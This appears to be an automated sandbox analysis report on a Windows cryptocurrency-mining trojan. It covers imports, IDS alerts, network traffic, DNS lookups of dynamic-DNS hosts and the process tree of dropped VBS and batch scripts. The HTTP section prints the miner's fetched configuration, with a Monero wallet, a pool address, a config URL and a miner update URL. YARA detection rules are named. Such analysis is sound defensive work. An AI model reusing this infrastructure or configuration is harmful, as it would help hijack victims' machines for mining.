RT_STRING	0x9972c	0x1e2	data	English	United States
RT_STRING	0x99910	0x1cc	data	English	United States
RT_STRING	0x99adc	0x1b8	data	English	United States
RT_STRING	0x99c94	0x146	Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500	English	United States
RT_STRING	0x99ddc	0x446	data	English	United States
RT_STRING	0x9a224	0x166	data	English	United States
RT_STRING	0x9a38c	0x152	data	English	United States
RT_STRING	0x9a4e0	0x10a	data	English	United States
RT_STRING	0x9a5ec	0xbc	data	English	United States
RT_STRING	0x9a6a8	0xd6	data	English	United States
RT_GROUP_ICON	0x9a780	0x84	data
RT_MANIFEST	0x9a804	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.564.235.37.554982433332845601 06/17/22-19:41:45.868458	TCP	2845601	ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2020-11-20 2)	49824	3333	192.168.2.5	64.235.37.55
192.168.2.5200.83.148.794982933332831812 06/17/22-19:41:57.703405	TCP	2831812	ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)	49829	3333	192.168.2.5	200.83.148.79
192.168.2.564.235.37.554981833332845601 06/17/22-19:41:41.357862	TCP	2845601	ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2020-11-20 2)	49818	3333	192.168.2.5	64.235.37.55
192.168.2.5200.83.148.794984433332831812 06/17/22-19:42:50.277017	TCP	2831812	ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)	49844	3333	192.168.2.5	200.83.148.79
192.168.2.564.235.37.554981833332831812 06/17/22-19:41:41.357862	TCP	2831812	ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)	49818	3333	192.168.2.5	64.235.37.55
192.168.2.564.235.37.554982433332831812 06/17/22-19:41:45.868458	TCP	2831812	ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)	49824	3333	192.168.2.5	64.235.37.55

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 17, 2022 19:41:40.794640064 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:41:40.932109118 CEST	80	49815	216.108.230.28	192.168.2.5
Jun 17, 2022 19:41:40.932528019 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:41:40.936539888 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:41:41.074739933 CEST	80	49815	216.108.230.28	192.168.2.5
Jun 17, 2022 19:41:41.074822903 CEST	80	49815	216.108.230.28	192.168.2.5
Jun 17, 2022 19:41:41.074856043 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:41:41.074923992 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:41:41.328465939 CEST	49818	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:41:41.357248068 CEST	3333	49818	64.235.37.55	192.168.2.5
Jun 17, 2022 19:41:41.357806921 CEST	49818	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:41:41.357861996 CEST	49818	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:41:41.386629105 CEST	3333	49818	64.235.37.55	192.168.2.5
Jun 17, 2022 19:41:41.386759996 CEST	3333	49818	64.235.37.55	192.168.2.5
Jun 17, 2022 19:41:41.503763914 CEST	49818	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:41:45.830843925 CEST	49824	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:41:45.859925032 CEST	3333	49824	64.235.37.55	192.168.2.5
Jun 17, 2022 19:41:45.860073090 CEST	49824	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:41:45.868458033 CEST	49824	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:41:45.897670031 CEST	3333	49824	64.235.37.55	192.168.2.5
Jun 17, 2022 19:41:45.897716999 CEST	3333	49824	64.235.37.55	192.168.2.5
Jun 17, 2022 19:41:46.050869942 CEST	49824	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:41:46.579845905 CEST	80	49815	216.108.230.28	192.168.2.5
Jun 17, 2022 19:41:46.580004930 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:41:54.455801964 CEST	49829	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:41:57.459146976 CEST	49829	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:41:57.691996098 CEST	3333	49829	200.83.148.79	192.168.2.5
Jun 17, 2022 19:41:57.702797890 CEST	49829	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:41:57.703404903 CEST	49829	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:41:57.936697960 CEST	3333	49829	200.83.148.79	192.168.2.5
Jun 17, 2022 19:41:58.047425032 CEST	49829	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:42:42.408847094 CEST	49818	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:42:42.437958956 CEST	3333	49818	64.235.37.55	192.168.2.5
Jun 17, 2022 19:42:42.607275009 CEST	49818	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:42:43.049793959 CEST	3333	49818	64.235.37.55	192.168.2.5
Jun 17, 2022 19:42:43.050219059 CEST	3333	49824	64.235.37.55	192.168.2.5
Jun 17, 2022 19:42:43.107418060 CEST	49818	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:42:43.247919083 CEST	49824	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:42:43.877449036 CEST	3333	49829	200.83.148.79	192.168.2.5
Jun 17, 2022 19:42:44.060549021 CEST	49829	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:42:45.980026007 CEST	49829	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:42:50.046756983 CEST	49844	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:42:50.276654959 CEST	3333	49844	200.83.148.79	192.168.2.5
Jun 17, 2022 19:42:50.276856899 CEST	49844	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:42:50.277017117 CEST	49844	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:42:50.511286020 CEST	3333	49844	200.83.148.79	192.168.2.5
Jun 17, 2022 19:42:50.607927084 CEST	49844	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:42:54.844551086 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:42:55.249028921 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:42:56.061503887 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:42:57.561667919 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:43:00.358788967 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:43:06.062407017 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:43:17.187470913 CEST	49815	80	192.168.2.5	216.108.230.28
Jun 17, 2022 19:43:20.911016941 CEST	49847	32640	192.168.2.5	200.83.148.79
Jun 17, 2022 19:43:24.063975096 CEST	49847	32640	192.168.2.5	200.83.148.79
Jun 17, 2022 19:43:26.811753988 CEST	3333	49818	64.235.37.55	192.168.2.5
Jun 17, 2022 19:43:26.812124968 CEST	3333	49824	64.235.37.55	192.168.2.5
Jun 17, 2022 19:43:26.907900095 CEST	49818	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:43:26.954773903 CEST	49824	3333	192.168.2.5	64.235.37.55
Jun 17, 2022 19:43:27.455982924 CEST	3333	49844	200.83.148.79	192.168.2.5
Jun 17, 2022 19:43:27.611063004 CEST	49844	3333	192.168.2.5	200.83.148.79
Jun 17, 2022 19:43:30.064409018 CEST	49847	32640	192.168.2.5	200.83.148.79

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 17, 2022 19:41:40.732495070 CEST	54850	53	192.168.2.5	8.8.8.8
Jun 17, 2022 19:41:40.750097036 CEST	53	54850	8.8.8.8	192.168.2.5
Jun 17, 2022 19:41:41.183192968 CEST	62832	53	192.168.2.5	8.8.8.8
Jun 17, 2022 19:41:41.323950052 CEST	53	62832	8.8.8.8	192.168.2.5
Jun 17, 2022 19:41:45.749914885 CEST	50668	53	192.168.2.5	8.8.8.8
Jun 17, 2022 19:41:45.769452095 CEST	53	50668	8.8.8.8	192.168.2.5
Jun 17, 2022 19:43:20.828509092 CEST	59558	53	192.168.2.5	8.8.8.8
Jun 17, 2022 19:43:20.849780083 CEST	53	59558	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 17, 2022 19:41:40.732495070 CEST	192.168.2.5	8.8.8.8	0x6ca	Standard query (0)	soloformin.linkpc.net	A (IP address)	IN (0x0001)
Jun 17, 2022 19:41:41.183192968 CEST	192.168.2.5	8.8.8.8	0xd1c9	Standard query (0)	updatebss.linkpc.net	A (IP address)	IN (0x0001)
Jun 17, 2022 19:41:45.749914885 CEST	192.168.2.5	8.8.8.8	0x68ea	Standard query (0)	updatebss.linkpc.net	A (IP address)	IN (0x0001)
Jun 17, 2022 19:43:20.828509092 CEST	192.168.2.5	8.8.8.8	0xce50	Standard query (0)	allswork.servebbs.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jun 17, 2022 19:41:40.750097036 CEST	8.8.8.8	192.168.2.5	0x6ca	No error (0)	soloformin.linkpc.net	216.108.230.28	A (IP address)	IN (0x0001)
Jun 17, 2022 19:41:41.323950052 CEST	8.8.8.8	192.168.2.5	0xd1c9	No error (0)	updatebss.linkpc.net	64.235.37.55	A (IP address)	IN (0x0001)
Jun 17, 2022 19:41:45.769452095 CEST	8.8.8.8	192.168.2.5	0x68ea	No error (0)	updatebss.linkpc.net	64.235.37.55	A (IP address)	IN (0x0001)
Jun 17, 2022 19:43:20.849780083 CEST	8.8.8.8	192.168.2.5	0xce50	No error (0)	allswork.servebbs.com	200.83.148.79	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

soloformin.linkpc.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49815	216.108.230.28	80	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Jun 17, 2022 19:41:40.936539888 CEST	1924	OUT	GET /1/config.txt HTTP/1.1 Accept: text/*, application/exe, application/zlib, application/gzip, application/applefile User-Agent: WinInetGet/0.1 Host: soloformin.linkpc.net Connection: Keep-Alive Cache-Control: no-cache
Jun 17, 2022 19:41:41.074739933 CEST	1935	IN	HTTP/1.1 200 OK Date: Fri, 17 Jun 2022 17:41:40 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.2 Last-Modified: Sat, 11 Jun 2022 18:43:34 GMT ETag: "779-5e1306ea8cd5c" Accept-Ranges: bytes Content-Length: 1913 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 5b 4d 69 6e 65 72 5d 0d 0a 61 64 64 72 65 73 73 3d 34 33 61 66 64 50 43 38 59 62 42 67 54 4e 65 55 64 50 45 67 55 70 38 44 4c 42 76 68 62 78 6a 63 5a 42 43 71 68 45 68 4e 5a 58 59 79 31 4c 4d 44 4e 6e 66 61 36 64 72 57 38 79 70 51 7a 48 56 67 73 62 4e 52 6e 39 4c 51 7a 6d 69 31 6d 54 71 53 6e 54 32 37 53 53 61 71 53 6f 63 72 71 58 48 09 3b 20 58 4d 52 20 61 64 64 72 65 73 73 2c 20 65 6d 61 69 6c 20 28 6d 69 6e 65 72 67 61 74 65 29 2c 20 62 74 63 20 61 64 64 72 65 73 73 20 28 6e 69 63 65 68 61 73 68 29 2c 20 65 74 63 2e 0d 0a 70 6f 6f 6c 70 6f 72 74 3d 32 30 30 2e 38 33 2e 31 34 38 2e 37 39 3a 33 33 33 33 09 3b 20 44 6f 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 73 74 72 61 74 75 6d 2b 74 63 70 3a 2f 2f 27 20 65 2e 67 20 6d 6f 6e 65 72 6f 68 61 73 68 2e 63 6f 6d 3a 33 33 33 33 0d 0a 70 61 73 73 77 6f 72 64 3d 78 09 09 09 09 3b 20 50 6f 6f 6c 20 70 61 73 73 77 6f 72 64 0d 0a 73 74 6f 70 3d 30 09 09 09 09 09 3b 20 43 68 61 6e 67 65 20 74 68 69 73 20 76 61 6c 75 65 20 74 6f 20 22 31 22 20 74 6f 20 73 74 6f 70 20 6d 69 6e 65 72 2e 20 49 66 20 6e 6f 74 20 73 70 65 63 69 66 69 65 64 20 6f 72 20 65 71 75 61 6c 20 74 6f 20 22 30 22 20 6d 69 6e 65 72 20 77 69 6c 6c 20 77 6f 72 6b 2e 20 0d 0a 70 72 6f 78 79 3d 31 09 09 09 09 09 3b 20 43 68 61 6e 67 65 20 74 68 69 73 20 76 61 6c 75 65 20 74 6f 20 22 31 22 20 69 66 20 79 6f 75 20 61 72 65 20 6d 69 6e 69 6e 67 20 74 6f 20 78 6d 72 69 67 2d 70 72 6f 78 79 20 69 6e 73 74 65 61 64 20 6f 66 20 70 6f 6f 6c 2e 20 54 68 69 73 20 65 6e 61 62 6c 65 73 20 75 73 69 6e 67 20 61 20 75 6e 71 69 75 65 20 61 64 64 72 65 73 73 20 70 65 72 20 77 6f 72 6b 65 72 20 66 6f 72 20 62 65 74 74 65 72 20 6d 69 6e 65 72 20 6d 6f 6e 69 74 6f 72 69 6e 67 2e 0d 0a 6b 65 65 70 61 6c 69 76 65 3d 30 09 09 09 09 3b 20 30 20 74 6f 20 64 69 73 61 62 6c 65 20 6b 65 65 70 61 6c 69 76 65 2c 20 31 20 74 6f 20 65 6e 61 62 6c 65 20 6b 65 65 70 61 6c 69 76 65 0d 0a 0d 0a 5b 55 70 64 61 74 65 5d 0d 0a 63 6f 6e 66 69 67 5f 75 72 6c 3d 68 74 74 70 3a 2f 2f 73 6f 6c 6f 66 6f 72 6d 69 6e 2e 6c 69 6e 6b 70 63 2e 6e 65 74 2f 31 2f 63 6f 6e 66 69 67 2e 74 78 74 20 20 20 09 3b 20 59 6f 75 20 63 61 6e 20 75 70 64 61 74 65 20 74 68 65 20 75 72 6c 20 74 68 61 74 20 70 6f 69 6e 74 73 20 74 6f 20 74 68 65 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 69 6c 65 2e 20 4d 75 73 74 20 62 65 67 69 6e 20 77 69 74 68 20 22 68 74 74 70 3a 2f 2f 22 20 6f 72 20 22 68 74 74 70 73 3a 2f 2f 22 20 0d 0a 6b 6e 6f 63 6b 5f 74 69 6d 65 3d 31 35 09 09 09 09 20 20 20 20 20 09 3b 20 4e 75 6d 62 65 72 20 6f 66 20 6d 69 6e 75 74 65 73 20 74 68 65 20 6d 69 6e 65 72 20 77 61 69 74 73 20 62 65 74 77 65 65 6e 20 76 69 73 69 74 73 20 74 6f 20 63 6f 6e 66 69 67 20 66 69 6c 65 2e 20 49 66 20 6e 65 76 65 72 20 73 70 65 63 69 66 69 65 64 2c 20 64 65 66 61 75 6c 74 20 69 73 20 33 30 20 6d 69 6e 75 74 65 73 2e 20 0d 0a 3b 75 70 64 61 74 65 5f 75 72 6c 3d 68 74 74 70 3a 2f 2f 32 31 36 2e 31 30 38 2e 32 33 30 2e 32 38 2f 33 32 62 69 74 35 35 35 32 74 6f 64 2e 65 78 65 09 09 3b 20 75 72 6c 20 6f 66 20 6e 65 77 20 6d 69 6e 65 72 2e 20 4d 69 6e 65 72 20 77 69 6c 6c 20 67 65 74 20 75 Data Ascii: [Miner]address=43afdPC8YbBgTNeUdPEgUp8DLBvhbxjcZBCqhEhNZXYy1LMDNnfa6drW8ypQzHVgsbNRn9LQzmi1mTqSnT27SSaqSocrqXH; XMR address, email (minergate), btc address (nicehash), etc.poolport=200.83.148.79:3333; Do not include 'stratum+tcp://' e.g monerohash.com:3333password=x; Pool passwordstop=0; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work. proxy=1; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.keepalive=0; 0 to disable keepalive, 1 to enable keepalive[Update]config_url=http://soloformin.linkpc.net/1/config.txt ; You can update the url that points to the configuration file. Must begin with "http://" or "https://" knock_time=15 ; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes. ;update_url=http://216.108.230.28/32bit5552tod.exe; url of new miner. Miner will get u
Jun 17, 2022 19:41:41.074822903 CEST	1936	IN	Data Raw: 70 64 61 74 65 64 20 77 69 74 68 20 74 68 69 73 20 66 69 6c 65 2e 20 0d 0a 3b 75 70 64 61 74 65 5f 68 61 73 68 3d 36 37 34 63 32 36 63 39 63 33 65 34 34 66 37 37 33 38 35 31 63 31 34 61 30 37 66 38 37 62 39 33 09 09 09 3b 20 6d 64 35 20 68 61 73 Data Ascii: pdated with this file. ;update_hash=674c26c9c3e44f773851c14a07f87b93; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated!;End of c

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 2rVBokoc2C.exePID: 7056, Parent PID: 2856

General

Target ID:	0
Start time:	19:40:36
Start date:	17/06/2022
Path:	C:\Users\user\Desktop\2rVBokoc2C.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\2rVBokoc2C.exe"
Imagebase:	0xba0000
File size:	4514981 bytes
MD5 hash:	C37FFEA9B9BA78C03A9296B73D3D55BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000003.430189255.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000000.00000003.429825827.000000000697A000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000003.429825827.000000000697A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000003.430505540.0000000006AF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6332, Parent PID: 7056

General

Target ID:	5
Start time:	19:40:47
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\install.vbs"
Imagebase:	0x10000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6404, Parent PID: 6332

General

Target ID:	7
Start time:	19:40:49
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\del.bat" "
Imagebase:	0x1100000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6416, Parent PID: 6404

General

Target ID:	8
Start time:	19:40:50
Start date:	17/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 4944, Parent PID: 6404

General

Target ID:	9
Start time:	19:40:50
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	TASKKILL /IM wscript.exe /F
Imagebase:	0x2f0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 3064, Parent PID: 6404

General

Target ID:	10
Start time:	19:40:54
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	TASKKILL /IM wscript.exe /F
Imagebase:	0x2f0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 6220, Parent PID: 6404

General

Target ID:	11
Start time:	19:40:54
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	TASKKILL /IM wscript.exe /F
Imagebase:	0x2f0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 5056, Parent PID: 6404

General

Target ID:	12
Start time:	19:40:55
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	TASKKILL /IM wscript.exe /F
Imagebase:	0x2f0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 6500, Parent PID: 6404

General

Target ID:	13
Start time:	19:40:56
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0x830000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: services.exePID: 6556, Parent PID: 684

General

Target ID:	14
Start time:	19:40:57
Start date:	17/06/2022
Path:	C:\Users\user\AppData\Roaming\01Atodo\services.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\01Atodo\services.exe"
Imagebase:	0xc10000
File size:	1955840 bytes
MD5 hash:	0C8E76FF6BA1CC33C2A37928A1E9642B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 23%, Metadefender, Browse Detection: 77%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6616, Parent PID: 6404

General

Target ID:	15
Start time:	19:40:58
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\delreg.vbs"
Imagebase:	0x10000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 6628, Parent PID: 6404

General

Target ID:	16
Start time:	19:40:58
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x830000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6308, Parent PID: 6404

General

Target ID:	17
Start time:	19:41:00
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\killroaming.vbs"
Imagebase:	0x10000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 6388, Parent PID: 6404

General

Target ID:	18
Start time:	19:41:01
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\killstatrup.vbs"
Imagebase:	0x10000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 5100, Parent PID: 6404

General

Target ID:	19
Start time:	19:41:01
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\deltemp.vbs"
Imagebase:	0x10000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wscript.exePID: 7104, Parent PID: 6404

General

Target ID:	20
Start time:	19:41:02
Start date:	17/06/2022
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\start.vbs"
Imagebase:	0x10000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

